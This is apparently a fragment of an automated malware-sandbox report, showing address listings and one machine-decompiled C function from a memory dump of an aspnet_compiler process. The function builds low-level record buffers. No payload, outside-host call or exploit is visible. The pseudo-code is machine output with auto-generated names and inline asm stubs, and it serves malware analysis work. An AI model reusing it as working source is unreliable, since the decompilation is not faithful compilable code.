                                                  0x0188fdce
                                                  0x0188fdd6
                                                  0x0188fdd8
                                                  0x00000000
                                                  0x0188fdd8
                                                  0x0188fd9d
                                                  0x01890018
                                                  0x018e60a0
                                                  0x018e60a0
                                                  0x0188fd4b
                                                  0x00000000
                                                  0x00000000
                                                  0x0188fd51
                                                  0x0188fd56
                                                  0x018e60a9
                                                  0x018e60af
                                                  0x018e60af
                                                  0x018e60a9
                                                  0x0188fd5e
                                                  0x0188febf
                                                  0x018e60b8
                                                  0x0188fec5
                                                  0x0188fec5
                                                  0x0188fec5
                                                  0x0188fec7
                                                  0x00000000
                                                  0x0188fd64
                                                  0x0188fd64
                                                  0x0188fd68
                                                  0x018e60c1
                                                  0x018e60c7
                                                  0x018e60c7
                                                  0x018e60c1
                                                  0x0188fd70
                                                  0x00000000
                                                  0x0188fd76
                                                  0x0188fd78
                                                  0x018e60d0
                                                  0x0188fd7e
                                                  0x0188fd7e
                                                  0x0188fd7e
                                                  0x0188fd80
                                                  0x00000000
                                                  0x0188fd80
                                                  0x0188fd70
                                                  0x0188fd5e
                                                  0x0188fd35
                                                  0x0188fd1f
                                                  0x018e604c
                                                  0x018e604c
                                                  0x0188fcb7
                                                  0x0188ffc0
                                                  0x0188ffc3
                                                  0x0188ffc6
                                                  0x0188ffcb
                                                  0x018e6055
                                                  0x018e605b
                                                  0x018e605b
                                                  0x018e6055
                                                  0x0188ffd3
                                                  0x00000000
                                                  0x0188ffd9
                                                  0x0188ffdb
                                                  0x018e6064
                                                  0x0188ffe1
                                                  0x0188ffe1
                                                  0x0188ffe1
                                                  0x0188ffe3
                                                  0x0188ffe7
                                                  0x0188ffed
                                                  0x00000000
                                                  0x0188ffed
                                                  0x0188ffd3
                                                  0x00000000
                                                  0x0188fcb7
                                                  0x018e603f
                                                  0x0188fc9a
                                                  0x00000000
                                                  0x0188fc9a
                                                  0x0188fc77
                                                  0x0188fc61
                                                  0x0188fc4e
                                                  0x0188fc33
                                                  0x018e5fe5
                                                  0x018e5fe5
                                                  0x0188fbf5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0188fbf5
                                                  0x0188fbdf
                                                  0x0188fa05
                                                  0x0188fa05
                                                  0x0188fa0a
                                                  0x0188fe14
                                                  0x018e5fb8
                                                  0x018e5fb8
                                                  0x0188fe1e
                                                  0x00000000
                                                  0x0188fe24
                                                  0x00000000
                                                  0x0188fe24
                                                  0x0188fe1e
                                                  0x0188fa10
                                                  0x0188fa10
                                                  0x0188fa15
                                                  0x0188fe29
                                                  0x0188fe2d
                                                  0x0188fe35
                                                  0x0188fe38
                                                  0x0188fe3b
                                                  0x018e5fc1
                                                  0x00000000
                                                  0x00000000
                                                  0x018e5fc7
                                                  0x0188fe43
                                                  0x0188fe45
                                                  0x00000000
                                                  0x00000000
                                                  0x0188fe4b
                                                  0x0188fe50
                                                  0x018e5fd0
                                                  0x018e5fd6
                                                  0x018e5fd6
                                                  0x018e5fd0
                                                  0x0188fe5d
                                                  0x0188fe60
                                                  0x00000000
                                                  0x0188fe60
                                                  0x0188fe41
                                                  0x0188fe41
                                                  0x00000000
                                                  0x0188fa1b
                                                  0x0188fa1b
                                                  0x0188fa1d
                                                  0x0188fa20
                                                  0x00000000
                                                  0x0188fa20
                                                  0x0188fa15
                                                  0x0188f9ed
                                                  0x0188f9ed
                                                  0x00000000
                                                  0x0188f9ed
                                                  0x0188f9cd
                                                  0x0188f9ba
                                                  0x0188f9ba
                                                  0x00000000
                                                  0x0188f9ba
                                                  0x0188fba8
                                                  0x0188fb65
                                                  0x0188fb1d
                                                  0x0188fb23
                                                  0x0188fb26
                                                  0x00000000
                                                  0x0188fb26
                                                  0x0188faf3
                                                  0x0188faf3
                                                  0x00000000
                                                  0x0188faf3
                                                  0x0188fab4
                                                  0x0188fa79
                                                  0x0188fa56
                                                  0x0188fa56
                                                  0x00000000
                                                  0x0188fa56
                                                  0x0188f94d
                                                  0x0188f950
                                                  0x0188f955
                                                  0x018e5e79
                                                  0x018e5e7f
                                                  0x018e5e7f
                                                  0x018e5e79
                                                  0x0188f95b
                                                  0x0188f960
                                                  0x018e5e88
                                                  0x018e5e8a
                                                  0x018e5e8a
                                                  0x018e5e8e
                                                  0x018e5e93
                                                  0x00000000
                                                  0x018e5e99
                                                  0x018e5e9c
                                                  0x018e5e9f
                                                  0x018e5ea1
                                                  0x018e5ea3
                                                  0x018e5ea3
                                                  0x018e5ea7
                                                  0x00000000
                                                  0x018e5ea7
                                                  0x0188f966
                                                  0x0188f966
                                                  0x0188f96b
                                                  0x018e5eb0
                                                  0x018e5eb6
                                                  0x018e5eb6
                                                  0x018e5eb0
                                                  0x0188f973
                                                  0x0188fbc7
                                                  0x0188f9a5
                                                  0x0188f9a5
                                                  0x00000000
                                                  0x0188f979
                                                  0x0188f97d
                                                  0x0188f97f
                                                  0x018e5ebf
                                                  0x018e5ec5
                                                  0x018e5ec5
                                                  0x018e5ebf
                                                  0x0188f987
                                                  0x00000000
                                                  0x0188f98d
                                                  0x0188f98d
                                                  0x0188f990
                                                  0x0188f994
                                                  0x0188f997
                                                  0x0188f99f
                                                  0x0188fff7
                                                  0x01890061
                                                  0x01890064
                                                  0x0189006a
                                                  0x018e5ece
                                                  0x018e5ed0
                                                  0x018e5ed0
                                                  0x00000000
                                                  0x01890064
                                                  0x0188fffd
                                                  0x01890000
                                                  0x00000000
                                                  0x01890006
                                                  0x018e5ecc
                                                  0x00000000
                                                  0x018e5ecc
                                                  0x01890000
                                                  0x00000000
                                                  0x0188f99f
                                                  0x0188f987
                                                  0x0188f973

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                                  • Instruction ID: 4d542f702608d54c51cb1ce4428801c04aad974afa4d1281e065c38765dfb6cd
                                                  • Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                                  • Instruction Fuzzy Hash: 4062E736E046669BDF32DE2C844026AFBB1AF55718F2D81A8DE65EB243D371DB41C780
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01955BA5 Relevance: .6, Instructions: 592COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E01955BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1961178);
				E018DD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = L01954C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E018CD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							L01955542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x19760e8;
								if( *0x19760e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x19760e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E018C9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E018C6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E018CF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E018CF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E018CF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E018CFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E018CFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E018CF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E018CF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = L01954CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E018DD130(_t427, _t494, _t511);
				}
			}










































































                                                  0x01955ba5
                                                  0x01955baa
                                                  0x01955baf
                                                  0x01955bb4
                                                  0x01955bb6
                                                  0x01955bbc
                                                  0x01955bbe
                                                  0x01955bc4
                                                  0x01955bcd
                                                  0x01955bd3
                                                  0x01955bd6
                                                  0x01955bdc
                                                  0x01955be0
                                                  0x01955be3
                                                  0x01955beb
                                                  0x01955bf2
                                                  0x01955bf8
                                                  0x01955bfe
                                                  0x01955c04
                                                  0x01955c0e
                                                  0x01955c18
                                                  0x01955c1f
                                                  0x01955c25
                                                  0x01955c2a
                                                  0x01955c2c
                                                  0x01955c32
                                                  0x01955c3a
                                                  0x01955c3f
                                                  0x01955c42
                                                  0x01955c48
                                                  0x01955c5b
                                                  0x01955c5b
                                                  0x01955c2c
                                                  0x01955cb7
                                                  0x01955cb9
                                                  0x01955cbf
                                                  0x01955cc2
                                                  0x01955cca
                                                  0x01955ccb
                                                  0x01955ccb
                                                  0x01955cd1
                                                  0x01955cd7
                                                  0x01955cda
                                                  0x01955ce1
                                                  0x01955ce4
                                                  0x01955ce7
                                                  0x01955ced
                                                  0x01955cf3
                                                  0x01955cf9
                                                  0x01955cff
                                                  0x01955d08
                                                  0x01955d0a
                                                  0x01955d0e
                                                  0x01955d10
                                                  0x00000000
                                                  0x00000000
                                                  0x01955d16
                                                  0x01955d1a
                                                  0x00000000
                                                  0x00000000
                                                  0x01955d20
                                                  0x01955d22
                                                  0x01955d25
                                                  0x01955d2f
                                                  0x01955d2f
                                                  0x01955d33
                                                  0x01955d3d
                                                  0x01955d49
                                                  0x01955d4b
                                                  0x00000000
                                                  0x00000000
                                                  0x01955d5a
                                                  0x01955d5d
                                                  0x01955d60
                                                  0x00000000
                                                  0x00000000
                                                  0x01955d66
                                                  0x01955d69
                                                  0x00000000
                                                  0x00000000
                                                  0x01955d6f
                                                  0x01955d6f
                                                  0x01955d73
                                                  0x01955d79
                                                  0x01955d7f
                                                  0x01955d86
                                                  0x01955d95
                                                  0x01955d98
                                                  0x01955dba
                                                  0x01955dcb
                                                  0x01955dce
                                                  0x01955dd3
                                                  0x01955dd6
                                                  0x01955dd8
                                                  0x01955de6
                                                  0x01955dec
                                                  0x01955dee
                                                  0x01955df1
                                                  0x01955df3
                                                  0x0195635a
                                                  0x0195635a
                                                  0x00000000
                                                  0x0195635a
                                                  0x01955dfe
                                                  0x01955e02
                                                  0x01955e05
                                                  0x01955e07
                                                  0x01955e10
                                                  0x01955e13
                                                  0x01955e1b
                                                  0x01955e1c
                                                  0x01955e21
                                                  0x01955e22
                                                  0x01955e23
                                                  0x01955e25
                                                  0x01955e2a
                                                  0x01955e2c
                                                  0x01955e2e
                                                  0x01955e36
                                                  0x01955e39
                                                  0x01955e42
                                                  0x01955e47
                                                  0x01955e4d
                                                  0x01955e54
                                                  0x01955e54
                                                  0x01955e54
                                                  0x01955e2e
                                                  0x01955e5c
                                                  0x01955e5f
                                                  0x01955e62
                                                  0x01955e64
                                                  0x01955e6b
                                                  0x01955e70
                                                  0x01955e7a
                                                  0x01955e7a
                                                  0x01955e7a
                                                  0x01955e6b
                                                  0x01955e7e
                                                  0x01955e7f
                                                  0x01955e7f
                                                  0x01955e81
                                                  0x01955e87
                                                  0x01955e8b
                                                  0x01955e8c
                                                  0x01955e8c
                                                  0x01955e8c
                                                  0x01955e9a
                                                  0x01955e9c
                                                  0x01955ea2
                                                  0x01955ea6
                                                  0x01955f50
                                                  0x01955f50
                                                  0x01955f57
                                                  0x01955f66
                                                  0x01955f66
                                                  0x01955f66
                                                  0x01955f68
                                                  0x01955f6a
